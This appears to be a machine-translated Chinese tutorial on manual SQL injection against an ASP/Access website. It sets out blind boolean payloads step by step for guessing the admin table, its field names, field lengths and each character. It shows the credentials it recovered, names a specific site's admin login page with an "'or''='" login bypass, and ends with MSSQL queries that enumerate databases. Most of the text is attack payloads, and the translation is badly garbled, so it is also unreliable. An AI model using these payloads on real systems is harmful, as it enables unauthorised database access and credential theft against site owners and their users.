TAG: SQL injection foundation
Explanation: I will explain again, please don't maliciously destroy, we just learn. Last time I will give you an instance of everyone, I will prepare it to use it to do animation, I have been modified. Oh ... hurt me I found another one.
Good start below .....
Judgment
Use '; use and 1 = 1 and 1 = 2
Judgment is very important and the main step, because if you don't judge if you don't judge it .. =========================== =================================================== return
Microsoft Jet Database Engine Error '80040e14'
Grammatical errors (operator loss) in query expressive 'ID = 544' ''.
/ Jiaren.asp, line 15
============================================================================================================================================================================================================= ==========================
Back to normal page
============================================ = 1 Return to normal page
================================================================================ = 2 Return error page
serial number:
Adodb.field error '800A0bcd'
One of BOF or EOF is "true", or the current record has been deleted, and the required operation requires a current record.
/ Jiaren.asp, line 28 =========================================== ======================================================================================================================================================================================================================================================================== At this time, there will be many friends to ask, why is there any injection? Hehe, you just remember that we will be judged by the difference between the return page. Only it returns the page twice to the same thing, you can know.
2. Guess the query statement of the most basic, the biggest talk of the query statement. As for the role of the statement, I will give you a description. But the specific meaning, please find SQL Search for information.
AND 0 <> (Select Count (*) from admin) --- Judging whether there is admin this table
Amporate is available, and the other parts don't change. We just returned to the correct page description existed this table. If you return an error, we don't exist, then we have to change the other. Such as: and 0 <> (Select Count " (*) from user) Of course, as long as you think you can try it. I gave you two tips on the class. I didn't think that many people actually knew these two. I asked me to change admin, user. Other can not. Comrades, this admin user can be replaced. However, not just let you want to change what the name is used to do the name. Because you are guessing, there must be ideas Guess is not a mess. Is it useful to 123 456? Is it useless because there is no name to do this. The name of the general table is nothing more than the admin Adminunuser PASS Password et al ..
3. Guess number and 0 <(Select Count (*) from admin) Everyone will find that the above statement is almost. Oh, the query part is the same as the previous number. This number is going to see how many user accounts. It is going to change. It's not fixed. 1. Because we are guess. Now we don't know how there are several accounts in the table, so if you fix it, you will not guess huh. .1 4. Guess the field name and 1 = (Select Count (*) from admin where len (name)> 0) User field name And 1 = (Select Count (*) from admin where len (password)> 0) Password field name Instructed the field name inside the table name and 1 = (Select Count (*) from admin where g (*)> 0) --- This is the core statement. It is also a statement of the public. What we have to do is len () Inside the parentheses, we think of the field name. Let's first guess the username. I use Name Ok. Then let's guess the code field. I first use Pass to dizzy, then we will change it again. Password looks ok right. Then we have guess the user fields and password fields. Below is guess length and specific characters. 5. Tell the length of the length of each field to deal with and 1 = (Select Count (*) from admin where g (*)> 0) > 0 replacement to other only guesses =? Return to the correct page, good, let's get started. The first is the account length ... Just account field is name and 1 = (Select Count (*) from admin where ln Name)> 0) Correct and 1 = (Select Count (*) from admin where len (name)> 1) Correct and 1 = (Select Count (*) from admin where len (name)> 2) correct and 1 = Select count (*) from admin where len (name)> 6) Error and 1 = (Select Count (*) from admin where len (name)> 5) correct and 1 = (Select Count (*) from admin where len Name)> 4) Correct then we can know that the length is 6and 1 = (select count (*) from admin where len (name) = 6) correct huh, = 6 Returns the correct page. Below is the length of the password field and 1 = (Select Count (*) from admin where len (password)> 0) correct and 1 = (select count (*) from admin where len (password> 6) correct and 1 = Select count (*) from admin where len (password)> 10) correct and 1 = (select count (*) from admin where len (password)> 15) Error and 1 = (Select Count (*) from admin where len Password> 14) Error AND 1 = (Select Count (*) from admin where len (password)> 13) Error AND 1 = (Select Count (*) from admin where len (password> 12) Error and 1 = Select count (*) from admin where len (password)> 11) The correct OK length is 12 Name 6Password 12 The length is out, the following is the specific character. 6. Guess characters and 1 = (Select Count (*) from admin where left (name, 1) = 'a') --- Treat user and 1 = (Select Count (*) from admin where left (Password, 1) = 'a') In this way, add a character to guess, guess enough, how much is it, it is right, the account will come out. AND 1 = (Select Count (*) from admin where left (pass, 1) = 'a') --- Guess password Left (Name, 1) = 'a' Note 1 position is the location of the characters you want to guece .and 1 = (Select Count (*) from admin where left (name, 1) = 'a') - - Guess the first and 1 = 1 = (select count (*) from admin where left (*) = 'ab') --- The second place of the user account is like this to guess So. And 1 = (Select Count (*) from admin where left (name, 1) = 'a') error ..... and 1 = (Select Count (*) from admin where left (name, 6) = 'PCLZYQ') Because this suspension process is relatively long, I will give the answer directly. And 1 = (Select Count (*) from admin where left (password, 1) = 'a') error ....... and 1 = (Select Count (*) from admin where left (password, 12) = 'PCLZYQ000215' directly gives the answer. Name = PCLZYQPassword = PCLZYQ000215 7. Find out the landing port, carry out the general landing port: admin.aspadmin_index.aspadmin / index.aspadmin / admin.asp .... You can accumulate yourself .. Don't forget to make a text file. I oh. ^ _ ^ We have http://www.talewin.com/admin.asp below to log in. Oh, the man who writes this program is also very simple because he has another problem with his landing mouth. Use 'or' '=' to see it, see it, you can go in. Huh, Description: Command: select meaning in Chinese: Selection: Used to find out the critical record Plus the total function: count Chinese meaning: Quantity Description: Used to specify the quantity Sudan: from Chinese Meaning: Data Sheet Description: Used to specify data sheet Sudoku: WHERE Chinese meaning: Condition Description: Used for setting conditions Operator: And meaning in Chinese: And explanation: logic TOP - Remove the previous specified length data Select Top 10 * from ..... AND 1 = (*) from admin where ASC (MID (Pass, 5, 1)) = 51) - This query statement can guess the Chinese user and password. As long as you exchange the rear numbers Chinese ASSIC code is OK. Finally, the result is converted into characters. Good animation is here, I think it is very clear. If anyone doesn't understand, I can ask you to ask, I will answer you. Get all library names and storage path Select Name, filename from master.dbo.sysdatabases get all table names of a library Select * from master.dbo.sysObjects where xtype = 'u'